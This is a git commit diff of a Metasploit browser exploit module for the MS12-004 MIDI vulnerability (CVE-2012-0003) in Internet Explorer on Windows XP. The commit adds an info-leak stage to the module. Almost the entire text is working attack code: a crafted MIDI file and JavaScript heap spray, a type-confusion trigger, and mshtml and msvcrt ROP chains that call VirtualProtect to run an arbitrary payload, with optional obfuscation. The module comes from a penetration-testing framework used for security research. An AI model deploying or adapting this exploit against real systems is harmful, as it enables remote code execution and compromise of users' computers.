Merge branch 'ms12_004_leaky_icky' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ms12_004_leaky_icky

unstable
jvazquez-r7 2012-12-21 21:01:05 +01:00
commit ff4b959c04
1 changed files with 290 additions and 193 deletions

View File

@ -1,8 +1,8 @@
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/ # http://metasploit.com/framework/
## ##
require 'msf/core' require 'msf/core'
@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
@ -42,8 +43,11 @@ class Metasploit3 < Msf::Exploit::Remote
(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
which leverages remote code execution under the context of the user. which leverages remote code execution under the context of the user.
Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,
msvcrt ROP to bypass DEP (Data Execution Prevention). if you know your target's patch level, you may also try the 'MSHTML' advanced
option for an info leak based attack. Currently, this module only supports two
MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.
Or 8.0.6001.19120, which is patch level before the MS12-004 fix.
Also, based on our testing, the vulnerability does not seem to trigger when Also, based on our testing, the vulnerability does not seem to trigger when
the victim machine is operated via rdesktop. the victim machine is operated via rdesktop.
@ -61,16 +65,16 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2012-0003' ], [ 'CVE', '2012-0003' ],
[ 'OSVDB', '78210'], [ 'OSVDB', '78210'],
[ 'BID', '51292'], [ 'BID', '51292'],
[ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ], [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ]
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 1024, 'Space' => 1024
}, },
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => "process", 'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f', 'InitialAutoRunScript' => 'migrate -f'
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
@ -79,39 +83,26 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
'IE 6 on Windows XP SP3', 'IE 6 on Windows XP SP3',
{ {
'Rop' => nil, 'Rop' => false,
'DispatchDst' => 0x0c0c0c0c 'DispatchDst' => 0x0c0c0c0c
} }
], ],
[ [
'IE 7 on Windows XP SP3', 'IE 7 on Windows XP SP3',
{ {
'Rop' => nil, 'Rop' => false,
'DispatchDst' => 0x0c0c0c0c 'DispatchDst' => 0x0c0c0c0c
} }
], ],
[ [
'IE 8 on Windows XP SP3 with JRE ROP', 'IE 8 on Windows XP SP3',
{ {
# xchg ecx,esp # xchg ecx,esp
# or byte ptr [eax],al # or byte ptr [eax],al
# add byte ptr [edi+5Eh],bl # add byte ptr [edi+5Eh],bl
# ret 8 # ret 8
# From IMAGEHLP # From IMAGEHLP
'Rop' => :msvcr71, 'Rop' => true,
'StackPivot' => 0x76C9B4C2,
'DispatchDst' => 0x0c0c1be4
}
],
[
'IE 8 on Windows XP SP3 with msvcrt',
{
# xchg ecx,esp
# or byte ptr [eax],al
# add byte ptr [edi+5Eh],bl
# ret 8
# From IMAGEHLP
'Rop' => :msvcrt,
'StackPivot' => 0x76C9B4C2, 'StackPivot' => 0x76C9B4C2,
'DispatchDst' => 0x0c0c1bd0 'DispatchDst' => 0x0c0c1bd0
} }
@ -126,11 +117,39 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class) ], self.class)
register_advanced_options(
[
OptEnum.new('MSHTML',
[
false, "MSHTML Build Version", '',
[
'', #Default (no leaky leaky)
'8.0.6001.18702', #newly installed Win XP SP3 non patched
'8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011
]
])
], self.class)
end
def exploit
@m_name, @midi = get_midi
@ml_name, @midi_leak = get_midi("leak")
@second_stage_url = rand_text_alpha(10)
@leak_param = rand_text_alpha(5)
# Offset to CFunctionPointer vftable in MSHTML
case datastore['MSHTML']
when '8.0.6001.18702'
@offset = 0xbf190
when '8.0.6001.19120'
@offset = 0xd92c8
end
super
end end
def get_target(request) def get_target(request)
agent = request.headers['User-Agent'] agent = request.headers['User-Agent']
vprint_status("Request from: #{agent}") print_status("Request as: #{agent}")
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP SP3 + IE 6.0 #Windows XP SP3 + IE 6.0
@ -139,14 +158,15 @@ class Metasploit3 < Msf::Exploit::Remote
#Windows XP SP3 + IE 7.0 #Windows XP SP3 + IE 7.0
return targets[2] return targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP SP3 + IE 8.0 + JRE6 #Windows XP SP3 + IE 8.0
return targets[3] return targets[3]
else else
return nil return nil
end end
end end
def get_midi # stage => "corruption" (default) | "leak"
def get_midi(stage="corruption")
# MIDI Fileformat Reference: # MIDI Fileformat Reference:
# http://www.sonicspot.com/guide/midifiles.html # http://www.sonicspot.com/guide/midifiles.html
# #
@ -183,9 +203,13 @@ class Metasploit3 < Msf::Exploit::Remote
tc << "\x85\x50\x99\x23\x7F" tc << "\x85\x50\x99\x23\x7F"
# Corruption events # Corruption events
if stage == "corruption"
# Midi Channel Event - Note On # Midi Channel Event - Note On
tc << "\x00\x9F\xb2\x73" tc << "\x00\x9F\xb2\x73"
# Ends Corruption events else
# Midi Channel Event - Note Off (trigger a leak)
tc << "\x00\x8F\xb2\x73"
end
# Meta Event - End Of Track # Meta Event - End Of Track
tc << "\x00\xFF\x2F\x00" tc << "\x00\xFF\x2F\x00"
@ -201,50 +225,76 @@ class Metasploit3 < Msf::Exploit::Remote
m << [tc.length].pack('N') m << [tc.length].pack('N')
m << tc m << tc
midi_name = "test_case.mid" #midi_name = "test_case.mid"
midi_name = rand_text_alpha(5) + ".mid"
return midi_name, m return midi_name, m
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
if request.uri =~ /\.mid$/i # Initialize a target. If none suitable, then we don't continue.
print_status("Sending midi file")
send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'})
return
end
#Set default target
my_target = target my_target = target
#If user chooses automatic target, we choose one based on user agent
if my_target.name =~ /Automatic/ if my_target.name =~ /Automatic/
my_target = get_target(request) my_target = get_target(request)
if my_target.nil? agent = request.headers['User-Agent']
if my_target.nil? and agent !~ /Windows\-Media\-Player|NSPlayer/
send_not_found(cli) send_not_found(cli)
print_error("Unknown user-agent") print_error("Unknown user-agent")
return return
end end
vprint_status("Target selected: #{my_target.name}") vprint_status("Target selected: #{my_target.name}") if not my_target.nil?
end end
# Send the corrupt midi file to trigger a memory leak, or a crash to that points
# to an arbitrary address.
if request.uri =~ /#{@ml_name}$/i
print_status("Testing for info leak...")
send_response(cli, @midi_leak, {'Content-Type'=>'application/octet-strem'})
return
elsif request.uri =~ /#{@m_name}$/i
print_status("Sending midi corruption file...")
send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'})
return
end
# Send the appropriate stage
if datastore['MSHTML'].to_s != '' and my_target['Rop']
if request.uri =~ /#{@second_stage_url}/
leak = begin
request.uri_parts["QueryString"][@leak_param].to_i
rescue
0
end
print_status("Leaked address: 0x#{leak.to_s(16)}")
send_stage(cli, my_target, 'trigger', leak)
return
end
send_stage(cli, my_target, 'leak')
else
send_stage(cli, my_target)
end
end
def send_stage(cli, my_target, stage='trigger', leak=0)
midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
if stage == 'leak'
midi_uri << "/#{@ml_name}"
trigger = build_trigger(my_target, "leak")
else
midi_uri << "/#{@m_name}" midi_uri << "/#{@m_name}"
trigger = build_trigger(my_target)
spray = build_spray(my_target) spray = build_spray(my_target, leak)
if datastore['OBFUSCATE']
spray = ::Rex::Exploitation::JSObfu.new(spray)
spray.obfuscate
end end
trigger = build_trigger(my_target)
trigger_fn = "trigger"
if datastore['OBFUSCATE'] if datastore['OBFUSCATE']
spray = ::Rex::Exploitation::JSObfu.new(spray).obfuscate
trigger = ::Rex::Exploitation::JSObfu.new(trigger) trigger = ::Rex::Exploitation::JSObfu.new(trigger)
trigger.obfuscate trigger.obfuscate
trigger_fn = trigger.sym("trigger") trigger_fn = trigger.sym('trigger')
else
trigger_fn = 'trigger'
end end
html = %Q| html = %Q|
@ -253,6 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote
<script language='javascript'> <script language='javascript'>
#{spray} #{spray}
</script> </script>
<script language='javascript'> <script language='javascript'>
#{trigger} #{trigger}
</script> </script>
@ -276,39 +327,34 @@ class Metasploit3 < Msf::Exploit::Remote
html = html.gsub(/^\t\t/, '') html = html.gsub(/^\t\t/, '')
print_status("Sending HTML") print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, {'Content-Type'=>'text/html'})
end end
def exploit def build_spray(my_target, leak=0)
@m_name, @midi = get_midi
super
end
def build_spray(my_target)
# Extract string based on target # Extract string based on target
if my_target.name =~ /JRE ROP$/ if my_target.name == 'IE 8 on Windows XP SP3'
js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);" js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
elsif my_target.name =~ /msvcrt$/
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
else else
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
end end
# Build shellcode based on Rop requirement # Build shellcode based on Rop requirement
if my_target['Rop'] code = ''
code = create_rop_chain(my_target) if my_target['Rop'] and datastore['MSHTML'].to_s != ''
print_status("Generating ROP using info-leak: 0x#{leak.to_s(16)}")
code << create_info_leak_rop(my_target, leak)
code << payload.encoded code << payload.encoded
shellcode = Rex::Text.to_unescape(code) elsif my_target['Rop'] and datastore['MSHTML'].to_s == ''
print_status("Generating ROP using msvcrt")
code << create_rop(my_target, payload.encoded)
else else
code = payload.encoded code << payload.encoded
shellcode = Rex::Text.to_unescape(code)
end end
shellcode = Rex::Text.to_unescape(code)
# 1. Create big block of nops # 1. Create big block of nops
# 2. Compose one block which is nops + shellcode # 2. Compose one block which is nops + shellcode
# 3. Repeat the block # 3. Repeat the block
@ -321,9 +367,7 @@ class Metasploit3 < Msf::Exploit::Remote
var nops = unescape("%u0c0c%u0c0c"); var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x1000) nops+= nops; while (nops.length < 0x1000) nops+= nops;
var shellcode = nops.substring(0,0x800 - code.length) + code;
#{js_shellcode}
while (shellcode.length < 0x40000) shellcode += shellcode; while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str} #{js_extract_str}
@ -340,7 +384,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Build the JavaScript string for the attributes # Build the JavaScript string for the attributes
def build_element(element_name, my_target) # type => "corruption" (default) | "leak"
def build_element(element_name, my_target, type="corruption")
dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V")) dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V"))
element = '' element = ''
@ -356,7 +401,12 @@ class Metasploit3 < Msf::Exploit::Remote
# Build attributes # Build attributes
0.upto(max) do |i| 0.upto(max) do |i|
case type
when "corruption"
obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" obj = (i==index) ? "unescape(\"#{dst}\")" : "alert"
else #leak
obj = "alert"
end
element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n" element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n"
end end
@ -369,46 +419,9 @@ class Metasploit3 < Msf::Exploit::Remote
# 3. Make holes # 3. Make holes
# 4. Let windows media play the crafted midi file and corrupt the heap # 4. Let windows media play the crafted midi file and corrupt the heap
# 5. Force the using of the confused tagVARIANT. # 5. Force the using of the confused tagVARIANT.
def build_trigger(my_target) def build_trigger(my_target, type="corruption")
js_trigger = build_trigger_fn(my_target, type)
if my_target.name =~ /IE 8 on Windows XP SP3/ select_element = build_element('selob', my_target, type)
# Redoing the feng shui if fails makes it reliable
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
} else {
clones[k].w1('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
select_element = build_element('selob', my_target)
else
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w0) == "string") {
} else {
clones[k].w0('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
select_element = build_element('selob', my_target)
end
trigger = <<-JS trigger = <<-JS
var heap = new heapLib.ie(); var heap = new heapLib.ie();
@ -416,7 +429,6 @@ class Metasploit3 < Msf::Exploit::Remote
var clones = new Array(1000); var clones = new Array(1000);
function feng_shui() { function feng_shui() {
heap.gc(); heap.gc();
var i = 0; var i = 0;
@ -431,7 +443,6 @@ class Metasploit3 < Msf::Exploit::Remote
CollectGarbage(); CollectGarbage();
j = j + 2; j = j + 2;
} }
} }
feng_shui(); feng_shui();
@ -443,85 +454,171 @@ class Metasploit3 < Msf::Exploit::Remote
return trigger return trigger
end end
def junk(n=1) # type = "corruption" (default) | "leak"
tmp = [] def build_trigger_fn(my_target, type="corruption")
value = rand_text(4).unpack("L")[0].to_i js_trigger=""
n.times { tmp << value } case type
return tmp when "corruption"
js_trigger = js_trigger_fn_corruption(my_target)
when "leak"
js_trigger = js_trigger_fn_leak(my_target)
end
return js_trigger
end end
def nop # Redoing the feng shui if fails makes it reliable
return make_nops(4).unpack("L")[0].to_i def js_trigger_fn_corruption(my_target)
attribute = (my_target.name == 'IE 8 on Windows XP SP3') ? 'w1' : 'w0'
js = %Q|
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].#{attribute}) == "string") {
} else {
clones[k].#{attribute}('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
|
return js
end end
def create_rop_chain(my_target) # Redoing the feng shui if fails makes it reliable
def js_trigger_fn_leak(my_target)
js_trigger = ""
if my_target.name == 'IE 8 on Windows XP SP3'
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
return;
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
end
pivot = my_target['StackPivot'] return js_trigger
end
case my_target['Rop'] def create_rop(t, p)
when :msvcrt # MSVCRT.dll ROP
padding = ''
padding << [0x77C4CA70].pack("V*") #ADD ESP,0C; RET
padding << [t['StackPivot']].pack("V*")
padding << [0x77C4CA73].pack("V*") * 12 #ROP NOPs
generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
end
def create_info_leak_rop(my_target, leak = 0x0)
base = (leak == 0x00) ? 0x63580000 : (leak - @offset)
print_status("Image base of mshtml: 0x%x" %base)
# Generate the gadgets based on offset
rop_gadgets = ''
case @offset
when 0xd92c8
rop_gadgets = rop_gadgets =
[ [
0x77c539ee, # RETN :junk,
pivot, :junk,
junk, 0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
0x77c4e392, # POP EAX # RETN :junk,
0x77c11120, # <- *&VirtualProtect() 0x247e5d, # ROP NOPs
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 0x247e5d,
junk, 0x247e5d,
0x77c2dd6c, 0x247e5d,
0x77c4ec00, # POP EBP # RETN 0x247e5d,
0x77c35459, # ptr to 'push esp # ret' 0x247e5d,
0x77c47705, # POP EBX # RETN 0x247e5d,
0x00000400, # <- change size to mark as executable if needed (-> ebx) 0x247e5c, # POP ESI # RETN [mshtml.dll]
0x77c3ea01, # POP ECX # RETN 0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll]
0x77c46100, # POP EDI # RETN 0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll]
0x77c46101, # ROP NOP (-> edi) :junk,
0x77c4d680, # POP EDX # RETN 0x3460c, # POP EBP # RETN [mshtml.dll]
0x00000040, # newProtect (0x40) (-> edx) :junk,
0x77c4e392, # POP EAX # RETN :junk,
nop, # NOPS (-> eax) 0x23ef79, # & jmp esp [mshtml.dll]
0x77c12df9, # PUSHAD # RETN 0x189303, # POP EBX # RETN [mshtml.dll]
].flatten.pack("V*") :ebx, # 0x00000201-> ebx
0x20437c, # POP EDX # RETN [mshtml.dll]
:edx, # 0x00000040-> edx
0xc277, # POP ECX # RETN [mshtml.dll]
0x53a47d, # &Writable location [mshtml.dll]
0x4a33e2, # POP EDI # RETN [mshtml.dll]
0x4b601, # RETN (ROP NOP) [mshtml.dll]
0x33fbc6, # POP EAX # RETN [mshtml.dll]
:nop,
0x52c718 # PUSHAD # RETN [mshtml.dll]
]
when :msvcr71 when 0xbf190
rop_gadgets = rop_gadgets =
[ [
0x7c347f98, # RETN (ROP NOP) :junk,
pivot, # stackpivot 0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
junk, # padding :junk,
0x7c376402, # POP EBP # RETN 0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7
0x7c376402, # skip 4 bytes :junk,
0x7c347f97, # POP EAX # RETN :junk,
0xfffff800, # Value to negate, will become 0x00000201 (dwSize) :junk,
0x7c351e05, # NEG EAX # RETN :junk,
0x7c354901, # POP EBX # RETN :junk,
0xffffffff, 0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x7c345255, # INC EBX # FPATAN # RETN 0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x3dc745, # POP ESI # RETN [mshtml.dll]
0x7c344f87, # POP EDX # RETN :neg, # 0xffffffff
0xffffffc0, # Value to negate, will become 0x00000040 0x2fb18b, # INC ESI # RETN [mshtml.dll]
0x7c351eb1, # NEG EDX # RETN 0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
0x7c34d201, # POP ECX # RETN 0x4aada7, # POP EBP # RETN [mshtml.dll]
0x7c38b001, # &Writable location :junk, # Compensates RETN
0x7c34b8d7, # POP EDI # RETN :junk, # Compensates RETN
0x7c347f98, # RETN (ROP NOP) 0x1ffc54, # & jmp esp [mshtml.dll]
0x7c364802, # POP ESI # RETN 0x4498a7, # POP EBX # RETN [mshtml.dll]
0x7c3415a2, # JMP [EAX] :ebx, # 0x00000800: 0x00000201-> ebx
0x7c347f97, # POP EAX # RETN 0x24cce4, # POP EDX # RETN [mshtml.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF (IAT) :edx, # 0x00000040-> edx
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x158306, # POP ECX # RETN [mshtml.dll]
0x7c345c30, # ptr to 'push esp # ret' 0x535098, # &Writable location [mshtml.dll]
].flatten.pack('V*') 0x1cf217, # POP EDI # RETN [mshtml.dll]
0xa0001, # RETN (ROP NOP) [mshtml.dll]
0x349f9b, # POP EAX # RETN [mshtml.dll]
:nop,
0x2afbe8 # PUSHAD # RETN [mshtml.dll]
]
end end
return rop_gadgets nops = make_nops(4).unpack("L")[0].to_i
rop_gadgets.map! { |e|
if e == :junk
rand_text(4).unpack("L")[0].to_i
elsif e == :neg
0xffffffff
elsif e == :ebx
0x00000800
elsif e == :edx
0x00000040
elsif e == :nop
nops
else
base + e
end end
}
chain = rop_gadgets.pack('V*')
return chain
end
end end
=begin
6367893A FF51 04 CALL DWORD PTR DS:[ECX+4]
=end